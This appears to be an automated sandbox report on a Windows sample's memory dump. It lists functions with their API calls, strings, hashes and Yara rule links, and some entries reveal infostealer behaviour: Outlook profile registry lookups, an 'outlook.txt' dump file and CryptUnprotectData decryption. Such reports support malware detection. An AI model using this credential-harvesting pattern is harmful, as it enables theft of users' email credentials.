Function 00DA7962, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,00DA7B83,?,?,00000000), ref: 00DA79D4
_free.LIBCMT ref: 00DA79C2

Part of subcall function 00DA6035: RtlFreeHeap.NTDLL(00000000,00000000,?,00DA2E0C,00D2254A,?), ref: 00DA604B
Part of subcall function 00DA6035: GetLastError.KERNEL32(?,?,00DA2E0C,00D2254A,?), ref: 00DA605D

_free.LIBCMT ref: 00DA7B8C

Strings

Pacific Daylight Time, xrefs: 00DA7A81
Pacific Standard Time, xrefs: 00DA7A6D

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: Pacific Daylight Time$Pacific Standard Time
API String ID: 2155170405-1154798116
Opcode ID: 5e04db44e32511d46b81012184d560d7683f87d5889e7b968932dd8275ded49b
Instruction ID: 010f4e4cac472b6062d33ce6cd4ef123a28fcad47eabc153f221af6466f3caf8
Opcode Fuzzy Hash: 5e04db44e32511d46b81012184d560d7683f87d5889e7b968932dd8275ded49b
Instruction Fuzzy Hash: 9051E472905215ABCB10BFA5DC4699EBBB8EF07760F144166F514E72A1EB319E00DBF0

Uniqueness

Uniqueness Score: -1.00%

Function 00D979AB, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162memorystringCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,0000FFFE,00000000,767F8B40,00DDBB00), ref: 00D979C3
wsprintfW.USER32 ref: 00D97AEA
lstrlenW.KERNEL32(?,?), ref: 00D97AF8
GlobalFree.KERNEL32 ref: 00D97B8E

Strings

%s%s%s%s, xrefs: 00D97AE4

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFreelstrlenwsprintf
String ID: %s%s%s%s
API String ID: 1742700945-2141907513
Opcode ID: aa38dc224b71cbb8bc78ea10644d16fb0005dcf0eb6fd4e1b45e060d619c540c
Instruction ID: 8ecd12259ec5e5e44bff04d5ce28ea45ce95b10bfc6d04b496b1bc1e83d111c8
Opcode Fuzzy Hash: aa38dc224b71cbb8bc78ea10644d16fb0005dcf0eb6fd4e1b45e060d619c540c
Instruction Fuzzy Hash: A6510775A04319EFDF049FA8DC45AAEBBB9FF48714F05416AE911A3360D770AE018BB4

Uniqueness

Uniqueness Score: -1.00%

Function 00D96D36, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE ref: 00D96D57
RegQueryValueExW.KERNELBASE ref: 00D96D7B
GlobalAlloc.KERNEL32(00000040,?), ref: 00D96D8B
RegQueryValueExW.KERNELBASE ref: 00D96DBB

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00D96D46, 00D96D4D

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue$AllocGlobalOpen
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 4011033216-1187197689
Opcode ID: 9e0cff327c188603dee83383a0475864afccdd4d93f1ca1f5d7b745acb97a515
Instruction ID: 18c9b5fb44ac7ade094b7d266b4f5f42b829c687e710421149e435d9998d141b
Opcode Fuzzy Hash: 9e0cff327c188603dee83383a0475864afccdd4d93f1ca1f5d7b745acb97a515
Instruction Fuzzy Hash: AD11E975A00259FBDF109B65DE08DAEBF78EB95754B04405AE911E2250EB309E05DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D96806, Relevance: 7.6, APIs: 5, Instructions: 124filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00D96845
GetFileSize.KERNEL32(00000000,00000000), ref: 00D96858
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00D96863
PathFindNextComponentW.SHLWAPI ref: 00D968B9

Part of subcall function 00D966F0: lstrlenW.KERNEL32(00000000,00000000,6B86FB40,00D96935), ref: 00D966F7
Part of subcall function 00D966F0: __fassign.LIBCMT ref: 00D96704

GlobalFree.KERNEL32 ref: 00D9697F

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: FileGlobal$AllocComponentCreateFindFreeNextPathSize__fassignlstrlen
String ID:
API String ID: 972262453-0
Opcode ID: 9422cf96bf6a226c24dc0647e1f89ea1f141119ca31777fda38618d0a9b3b5b0
Instruction ID: 1f690cc429cca7ae05f72a6e7d95dc0d8a42fad6c44358e29e48ef110899a9ab
Opcode Fuzzy Hash: 9422cf96bf6a226c24dc0647e1f89ea1f141119ca31777fda38618d0a9b3b5b0
Instruction Fuzzy Hash: F9419531900329EBDF209F24DC55AAAB778EF44714F0041AAE905E32A0EF709E45CFB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D96699, Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 34stringmemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,0000FFFE,00000074,00000064,00D336C7), ref: 00D966A4
StrStrW.KERNELBASE ref: 00D966C9
lstrcpyW.KERNEL32 ref: 00D966D6
lstrcpyW.KERNEL32 ref: 00D966E5

Strings

\\?\, xrefs: 00D966BD, 00D966D0

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpy$AllocGlobal
String ID: \\?\
API String ID: 689431796-4282027825
Opcode ID: 4299d55accdf60c3b0e9c1948398368473f580a81e5cb12344ffc5c2b7e21f76
Instruction ID: 0caa5952a83ce8a1360310a3abbf5a78a679b2aed7e87ed8f33c6b4c626befd0
Opcode Fuzzy Hash: 4299d55accdf60c3b0e9c1948398368473f580a81e5cb12344ffc5c2b7e21f76
Instruction Fuzzy Hash: CAF06575340306EBDB152B69AE88E276B6DDFC4B517040176F901D3390DB70CC189770

Uniqueness

Uniqueness Score: -1.00%

Function 00D211FD, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38memorysynchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(00000000,00000000,00000000,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,00D31CBE,Local AppData,00DD9D0C,00000000,AppData,00DD9D08,00000000), ref: 00D21205
VirtualAlloc.KERNELBASE(00000000,00040000,00001000,00000004,?,00D31CBE,Local AppData,00DD9D0C,00000000,AppData,00DD9D08,00000000), ref: 00D21223
VirtualAlloc.KERNELBASE(00000000,08700000,00001000,00000004,?,00D31CBE,Local AppData,00DD9D0C,00000000,AppData,00DD9D08,00000000), ref: 00D2123B

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00D211FF

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual$CreateMutex
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 3644167909-1187197689
Opcode ID: 083d01f5c2854bb1a3b12cca2830a9deec2d085543d02a8241fe805f33cb7400
Instruction ID: 6b2127c06e0acdab45b7b31bb9f092608e0d80a6496f202ab3356f669b33047a
Opcode Fuzzy Hash: 083d01f5c2854bb1a3b12cca2830a9deec2d085543d02a8241fe805f33cb7400
Instruction Fuzzy Hash: 7AF06D75502360EAD7206F26AC1AB877B68EF52764F200116B610E22D0D6718201CAB8

Uniqueness

Uniqueness Score: -1.00%

Function 00D9AEF2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00D9AF9F

Part of subcall function 00D96544: RegOpenKeyExW.KERNELBASE ref: 00D9658E
Part of subcall function 00D96544: RegQueryInfoKeyW.ADVAPI32 ref: 00D965BD
Part of subcall function 00D96544: RegEnumKeyExW.ADVAPI32 ref: 00D9660A
Part of subcall function 00D96544: GlobalAlloc.KERNEL32(00000040,00000400), ref: 00D96625
Part of subcall function 00D96544: RegCloseKey.ADVAPI32 ref: 00D96684

Part of subcall function 00D9B13E: lstrlenW.KERNEL32(?,00000000,00000000,outlook.txt), ref: 00D9B18B
Part of subcall function 00D9B13E: lstrcpyW.KERNEL32 ref: 00D9B1B8
Part of subcall function 00D9B13E: lstrlenW.KERNEL32(?,?,00000040), ref: 00D9B1DF
Part of subcall function 00D9B13E: wsprintfW.USER32 ref: 00D9B210
Part of subcall function 00D9B13E: CryptUnprotectData.CRYPT32 ref: 00D9B27F
Part of subcall function 00D9B13E: GlobalAlloc.KERNEL32(00000040,?), ref: 00D9B291

Strings

outlook.txt, xrefs: 00D9AF0C
SOFTWARE\Microsoft\Office\%s\Outlook\Profiles\Outlook\, xrefs: 00D9AF99

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocGloballstrlenwsprintf$CloseCryptDataEnumInfoOpenQueryUnprotectlstrcpy
String ID: SOFTWARE\Microsoft\Office\%s\Outlook\Profiles\Outlook\$outlook.txt
API String ID: 2803464172-4240974691
Opcode ID: 65b0c0c09bd0f9f78e83cbda95b4001998707cec327fd73a8bbed2c02676a858
Instruction ID: f42f2b751d5a31f16c6daca8326ac720008c27c9b4517b89e570f03bf3dfdcf4
Opcode Fuzzy Hash: 65b0c0c09bd0f9f78e83cbda95b4001998707cec327fd73a8bbed2c02676a858
Instruction Fuzzy Hash: 5D214D71A012289BCB249F549C546D9B7F8FF55344F0080EAA54A67341DB709E89CFF4

Uniqueness

Uniqueness Score: -1.00%

Function 00DA888F, Relevance: 4.6, APIs: 3, Instructions: 61COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00DA87BD,?,00DD53A8,0000000C,00DA886F,00000000,?,?), ref: 00DA88E5
GetLastError.KERNEL32(?,00DA87BD,?,00DD53A8,0000000C,00DA886F,00000000,?,?), ref: 00DA88EF
__dosmaperr.LIBCMT ref: 00DA891A

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 2651205c8131cfceceb94dd8fbee10d23e7610d05d72d0a4ec4951be33fc644a
Instruction ID: 3d3ee79c338060b3419aaa9888be32c39d0aac279732075779fd5fb9a450a940
Opcode Fuzzy Hash: 2651205c8131cfceceb94dd8fbee10d23e7610d05d72d0a4ec4951be33fc644a
Instruction Fuzzy Hash: 190104336052605AD6242238BC49B7EA7498F83734F69071DFC15872C2EF298C80A276

Uniqueness

Uniqueness Score: -1.00%

Function 00DA928D, Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000002,00000000,00000000,?,?,?,00DA933A,00000000,?,00000000,00000002), ref: 00DA92C6
GetLastError.KERNEL32(?,00DA933A,00000000,?,00000000,00000002,?,00DA3C18,?,00000000,00000000,00000001,00000000,00000020,?,00DA3CCE), ref: 00DA92D0
__dosmaperr.LIBCMT ref: 00DA92D7

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 9bffbf20f1c3ff2cd4b8bfa766d15a5e6df4f61037a4bd28501b205ec31019c6
Instruction ID: 6c989ce2603adb30a2fb0e720e492876cf8e6e8db8bb9bddcf57ff31348487fc
Opcode Fuzzy Hash: 9bffbf20f1c3ff2cd4b8bfa766d15a5e6df4f61037a4bd28501b205ec31019c6
Instruction Fuzzy Hash: C901D472610614FFCB059FA9DC1599E7B69EF87320B280208F851DB290FA70DD419BB4

Uniqueness

Uniqueness Score: -1.00%

Function 00DA6339, Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00DA635A

Part of subcall function 00DA606F: RtlAllocateHeap.NTDLL(00000000,00D224D8,?,?,00D224D8,?), ref: 00DA60A1

RtlReAllocateHeap.NTDLL(00000000,?,?,00000100,?,?,00D279DA,?,00000100), ref: 00DA6396

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap$_free
String ID:
API String ID: 1482568997-0
Opcode ID: ff4eff7e7694f4a22fcfb81e33630ee1363912a495bb4e8bd3d441c04a9581d9
Instruction ID: 9a4aaec5775931d7a2d2a34481a109461f0cb57274473f6180d3f85e52058f8b
Opcode Fuzzy Hash: ff4eff7e7694f4a22fcfb81e33630ee1363912a495bb4e8bd3d441c04a9581d9
Instruction Fuzzy Hash: 6DF06232101615E6CF226B26AC05A6B2769DF83BB0B1D8215F95496191EF70D8425171

Uniqueness

Uniqueness Score: -1.00%

Function 00D9EDF9, Relevance: 2.6, APIs: 2, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?,00000000,767FD330,00DDBB00), ref: 00D9EEA6
GlobalFree.KERNEL32 ref: 00D9EF4D

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: cad9fb51eb0a34f654b243036513c813348da1408b544a221d7dfa3b3d0ddf61
Instruction ID: e871a02ca78a225ad16ab7d9be88a0c81e06dc86582037cb1995cc2bee26c68b
Opcode Fuzzy Hash: cad9fb51eb0a34f654b243036513c813348da1408b544a221d7dfa3b3d0ddf61
Instruction Fuzzy Hash: 89416D70A006299BDB28DF25DC45AE9F7B5FF54310F04829AE45993290EF30AE44CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D9A2BC, Relevance: 2.6, APIs: 2, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,00000000,00003000,00000040,?,00000000,00000000,?,?,00D9A3E2,?,00DD4F48,00000174,00D9A5B7,00000020,00000000), ref: 00D9A317
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00D9A3E2,?,00DD4F48,00000174,00D9A5B7,00000020,00000000,?,?,00000074), ref: 00D9A345

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c537472ade01826ee080dce013b1313e5e5eb6f935e59924679e1f7f862c3d35
Instruction ID: 4f928c7a0797235ec8e9d2934a7c81b34c91da7e00ab682f299816b29ec9603d
Opcode Fuzzy Hash: c537472ade01826ee080dce013b1313e5e5eb6f935e59924679e1f7f862c3d35
Instruction Fuzzy Hash: FB11BE72300701DBDB24CFBDCC99BA6BBE9EB40304F18052AEA46C6390E6B0E9408665

Uniqueness

Uniqueness Score: -1.00%

Function 00D99E61, Relevance: 1.6, APIs: 1, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,00000000,00000002,00000074,?,00000000,00000000,?,?,00D9A434,?,?,?,00DD4F48,00000174,00D9A5B7), ref: 00D99ED4

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e67d238cd7be51097f51e9988dbdee340f2971c2d57a893db579b83a86707d54
Instruction ID: 309d6531c61cbd255a0deace118de8cff26d58a16fbf00f0ba2e35a2fdb8670a
Opcode Fuzzy Hash: e67d238cd7be51097f51e9988dbdee340f2971c2d57a893db579b83a86707d54
Instruction Fuzzy Hash: F911A5B2645206ABDF25CEBE89B9BB2F795FB00700F18051DFA41D6294D271ED80D3B0

Uniqueness

Uniqueness Score: -1.00%

Function 00DA85D4, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00DA860E

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 93f8e47c00de30d2f35128aa84909fcfbfcfcee2fbf60e1e9effb2b1b5659a0c
Instruction ID: df0835a170dfe01ba7cc0acdaabdbfe1d2ce8c2c678fd443246d049535e44d4d
Opcode Fuzzy Hash: 93f8e47c00de30d2f35128aa84909fcfbfcfcee2fbf60e1e9effb2b1b5659a0c
Instruction Fuzzy Hash: D2114871A0420AAFCF05DF58E94198B7BF4EF49304F044059F808EB211D631DA11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00DAAB36, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00DA63A2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00DA68EB,00000001,00000364,00000006,000000FF,?,00000000,00DA632B,00DA605B,?,?,00DA2E0C), ref: 00DA63E3

_free.LIBCMT ref: 00DAABA5

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 83d5c5a46121bfe60e12f40fa777368c8dc61802fc54359301beb97878606101
Instruction ID: c486fadf0513183d93e0ca8fa162b6beaf233ea16ddbb6a1962ed72b93b38b6d
Opcode Fuzzy Hash: 83d5c5a46121bfe60e12f40fa777368c8dc61802fc54359301beb97878606101
Instruction Fuzzy Hash: FF014572600316AFC7218FA9C8859CAFB98FB067B0F180729E555B76C0E370AC11CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00DA39AF, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bde411a4d8b8b350991213ccd89e6a815b6d9efa647f8b66d9041083ecee25c0
Instruction ID: c6bc3a78f126143305b9c9cc059a54e8f573d7508421187a7d136c377ff649f9
Opcode Fuzzy Hash: bde411a4d8b8b350991213ccd89e6a815b6d9efa647f8b66d9041083ecee25c0
Instruction Fuzzy Hash: B5F028325016205BD6213A799C06B6B3699CF53334F184B19F9A4921D2DF74D9029AF6

Uniqueness

Uniqueness Score: -1.00%

Function 00DAA77E, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00DAA7E1

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6c5e488576761ec3384609ced1e921f64e1caaa62f9e5ddb936219ec0e387d5e
Instruction ID: 4ae26a38e2d000a089ef83d19d13240d855129246dd7d9084731f013e97fc701
Opcode Fuzzy Hash: 6c5e488576761ec3384609ced1e921f64e1caaa62f9e5ddb936219ec0e387d5e
Instruction Fuzzy Hash: 90011272C00159BFCF52AFA8CC01AEE7FB5EF09310F144265F914E21A1E7358A65DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00DA63A2, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00DA68EB,00000001,00000364,00000006,000000FF,?,00000000,00DA632B,00DA605B,?,?,00DA2E0C), ref: 00DA63E3

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8763e3c3ba3c8b40ceb97c2ab86e4c8f366ca97e70648b854286cdd9d3d0da7c
Instruction ID: 7fd692f6b649d40ccffcffe3d75c68bd56a7e72bad8ba2199acd44d7fdc4b405
Opcode Fuzzy Hash: 8763e3c3ba3c8b40ceb97c2ab86e4c8f366ca97e70648b854286cdd9d3d0da7c
Instruction Fuzzy Hash: 1CF0BE32205220E79F216A26ED15A5A3B88EF43BB1B1C8026EC04EA194DBB0DC0286B0

Uniqueness

Uniqueness Score: -1.00%

Function 00D99DAB, Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aedac6ea08ab0be85cc74f83225a0f01f3d71b501670481f89ed2ecd486a8d45
Instruction ID: 2121bfcbd2e15d5612cf9e15aff458f41077f604c1efd52ba49b89aa8bf9270f
Opcode Fuzzy Hash: aedac6ea08ab0be85cc74f83225a0f01f3d71b501670481f89ed2ecd486a8d45
Instruction Fuzzy Hash: DDF0E232B6005ABBCF10EE2CCC81EAAB769EF06750F100429F855C7140E371ED2187B0

Uniqueness

Uniqueness Score: -1.00%

Function 00DAE9D4, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00DA63A2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00DA68EB,00000001,00000364,00000006,000000FF,?,00000000,00DA632B,00DA605B,?,?,00DA2E0C), ref: 00DA63E3

_free.LIBCMT ref: 00DAE9F6

Part of subcall function 00DA6035: RtlFreeHeap.NTDLL(00000000,00000000,?,00DA2E0C,00D2254A,?), ref: 00DA604B
Part of subcall function 00DA6035: GetLastError.KERNEL32(?,?,00DA2E0C,00D2254A,?), ref: 00DA605D

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: 8e0f6917ba94eab4377d50f01836c1ea209a83e95d8322713187f5d3633f88a9
Instruction ID: b3643eee4d78efa24e250e68bbbc371f5cebd2990223354b6ecf85f59737c03c
Opcode Fuzzy Hash: 8e0f6917ba94eab4377d50f01836c1ea209a83e95d8322713187f5d3633f88a9
Instruction Fuzzy Hash: EDF06D725017009FD3219F45D806B52B7E8EB81B11F14882EE29A9B6A0D7B5E845CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00DA606F, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00D224D8,?,?,00D224D8,?), ref: 00DA60A1

